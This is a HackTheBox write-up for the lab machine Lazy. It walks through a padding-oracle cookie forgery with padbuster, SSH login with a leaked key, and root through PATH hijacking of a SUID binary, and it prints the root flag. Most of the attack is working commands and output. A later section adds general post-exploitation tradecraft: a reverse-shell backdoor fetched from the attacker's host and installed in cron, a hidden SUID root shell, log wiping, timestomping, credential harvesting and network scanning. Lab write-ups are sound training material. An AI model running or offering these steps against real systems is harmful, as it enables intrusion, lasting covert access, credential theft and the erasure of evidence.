Post

HackTheBox Lazy

Writeup for HackTheBox Lazy

HackTheBox Lazy

Machine Synopsis

Key Exploitation Techniques:

  • Padding Oracle Attack (AES-CBC session cookie manipulation)
  • SSH key discovery via admin panel access
  • SSH authentication bypass (PubkeyAcceptedKeyTypes)
  • SUID binary exploitation (PATH hijacking via unsafe external command execution)

Reconnaissance & Enumeration

Port Discovery

1
2
3
4
$ nmap -sC -sV -A 10.10.10.18
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))

Web Application Analysis

The website hosts a “CompanyDev” portal with login and registration functionality. SQL injection tests against the login form show no direct vulnerabilities.

1
2
3
# Test for SQL injection
$ sqlmap -r login_request.txt --batch
[CRITICAL] all tested parameters do not appear to be injectable.

Directory Enumeration

1
2
3
4
5
6
$ gobuster dir -u http://10.10.10.18 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
/images               (Status: 301)
/index.php            (Status: 200)
/login.php            (Status: 200)
/register.php         (Status: 200)
/logout.php           (Status: 302)

Exploitation

Padding Oracle Discovery

Registration creates an auth cookie. Modifying this cookie triggers “incorrect padding” errors, indicating a Padding Oracle vulnerability.

auth_cookie

auth_cookie_incorrect

Cookie Analysis:

  • Normal cookie: IxYyntb34ugmMvdXexQbh28%2FZR4JGpPs
  • Modified cookie: Results in padding error

Padding Oracle Attack

1
2
3
4
# Decrypt existing auth cookie to understand format
$ padbuster http://10.10.10.18/index.php IxYyntb34ugmMvdXexQbh28%2FZR4JGpPs 8 -cookies auth=IxYyntb34ugmMvdXexQbh28%2FZR4JGpPs -encoding 0

[+] Decrypted value (ASCII): user=shiro
1
2
3
4
# Encrypt new plaintext for admin access
$ padbuster http://10.10.10.18/index.php IxYyntb34ugmMvdXexQbh28%2FZR4JGpPs 8 -cookies auth=IxYyntb34ugmMvdXexQbh28%2FZR4JGpPs -encoding 0 -plaintext user=admin

[+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA

Admin Panel Access

Replace the browser session cookie with BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA to gain administrative access.

admin_login

SSH Key Discovery

The admin dashboard contains a “My Key” link providing an RSA private key named mysshkeywithnamemitsos.

rsa_key

1
2
3
# Download SSH key
$ wget -O id_rsa http://10.10.10.18/mysshkeywithnamemitsos
$ chmod 600 id_rsa

SSH Authentication Bypass

1
2
3
4
5
6
7
# Initial connection fails due to signature algorithm mismatch
$ ssh -i id_rsa mitsos@10.10.10.18
sign_and_send_pubkey: no mutual signature supported

# Bypass by accepting ssh-rsa key types
$ ssh -i id_rsa mitsos@10.10.10.18 -o PubkeyAcceptedKeyTypes=+ssh-rsa
mitsos@LazyClown:~$

Privilege Escalation

SUID Binary Discovery

1
2
mitsos@LazyClown:~$ ls -la
-rwsrwsr-x 1 root   root   7303 May  3  2017 backup

Binary Analysis

1
2
3
4
5
mitsos@LazyClown:~$ ./backup 
root:$6$v1daFgo/$.7m9WXOoE4CKFdWvC.8A9aaQ334avEU8KHTmhjjGXMl0CTvZqRfNM5NO2/.7n2WtC58IUOMvLjHL0j4Os...

mitsos@LazyClown:~$ strings backup 
cat /etc/shadow

Vulnerability: The binary calls cat without full path, enabling PATH hijacking.

PATH Hijacking Exploitation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# Modify PATH to prioritize /tmp
mitsos@LazyClown:~$ export PATH=/tmp:$PATH

# Create malicious cat script
mitsos@LazyClown:/tmp$ cat > cat << 'EOF'
#!/bin/sh
/bin/sh
EOF
mitsos@LazyClown:/tmp$ chmod +x cat

# Execute SUID binary to trigger malicious cat
mitsos@LazyClown:~$ ./backup 
# whoami
root
# cat /root/root.txt
489332b5fb06c89a9618f082b1b107a2

Post-Exploitation Techniques

Persistence Methods

SSH Key Persistence

1
2
3
4
5
6
# Generate new SSH key pair
$ ssh-keygen -t rsa -b 4096 -f lazy_persistence

# Add public key to root authorized_keys
# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ..." >> /root/.ssh/authorized_keys
# chmod 600 /root/.ssh/authorized_keys

Cron Backdoor

1
2
3
4
5
6
7
8
# Create reverse shell payload
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 -f elf -o backdoor
$ python3 -m http.server 80

# Download and install on target
# wget 10.10.14.6/backdoor -O /tmp/.update
# chmod +x /tmp/.update
# echo "*/10 * * * * /tmp/.update" >> /etc/crontab

SUID Backdoor Maintenance

1
2
3
4
5
6
# Create permanent SUID shell
# cp /bin/bash /tmp/.rootshell
# chmod 4755 /tmp/.rootshell

# Hide with file attributes
# chattr +i /tmp/.rootshell

Defense Evasion

Log Cleanup

1
2
3
4
5
6
7
8
9
# Clear authentication logs
# > /var/log/auth.log
# > /var/log/secure
# > /var/log/wtmp
# > /var/log/lastlog

# Clear command history
# > /root/.bash_history
# > /home/mitsos/.bash_history

Artifact Timestomping

1
2
3
# Match timestamps to system files
# touch -r /bin/ls /tmp/.rootshell
# touch -r /bin/cat /tmp/cat

Lateral Movement Preparation

Network Discovery

1
2
3
4
5
# Scan local network
# for i in {1..254}; do ping -c 1 -W 1 192.168.1.$i | grep "64 bytes" | cut -d" " -f4 | tr -d ":"; done

# Port enumeration
# nmap -sT -p- --min-rate 5000 192.168.1.0/24

Credential Harvesting

1
2
3
4
5
6
7
8
# Extract password hashes
# cat /etc/shadow > /tmp/shadow.txt

# Search for SSH keys
# find /home -name "*.pem" -o -name "id_*" 2>/dev/null

# Look for stored credentials
# grep -r "password\|pass" /home/*/.*config* 2>/dev/null

Service Enumeration

1
2
3
4
5
6
7
8
9
# List network services
# netstat -tlnp

# Check for running databases
# ps aux | grep -E "(mysql|postgres|mongo)"

# Examine cron jobs
# cat /etc/crontab
# ls -la /etc/cron.*/*

Alternative Exploitation Methods

Manual Padding Oracle

1
2
3
4
5
6
7
8
9
10
# Manual cookie manipulation for testing
$ python3 -c "
import requests
import base64

# Test various padding scenarios
cookie = 'IxYyntb34ugmMvdXexQbh28%2FZR4JGpPs'
response = requests.get('http://10.10.10.18/index.php', cookies={'auth': cookie + 'A'})
print('Padding error detected' if 'padding' in response.text else 'No error')
"

Alternative SSH Access

1
2
# Try different SSH configurations
$ ssh -i id_rsa mitsos@10.10.10.18 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null

Alternative Privilege Escalation

LinPEAS Enumeration

1
2
3
4
# Transfer and run LinPEAS
mitsos@LazyClown:/tmp$ wget 10.10.14.6/linpeas.sh
mitsos@LazyClown:/tmp$ chmod +x linpeas.sh
mitsos@LazyClown:/tmp$ ./linpeas.sh

Kernel Exploitation

1
2
3
4
5
6
# Check kernel version
mitsos@LazyClown:/tmp$ uname -a
Linux LazyClown 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64

# Search for applicable exploits
$ searchsploit linux kernel 4.4 | grep -i privilege

Docker Escape (if applicable)

1
2
3
4
5
# Check for Docker environment
mitsos@LazyClown:/tmp$ ls -la /.dockerenv 2>/dev/null && echo "Docker detected"

# Check for privileged containers
mitsos@LazyClown:/tmp$ cat /proc/self/status | grep -E "(CapInh|CapPrm|CapEff)"

This post is licensed under CC BY 4.0 by the author.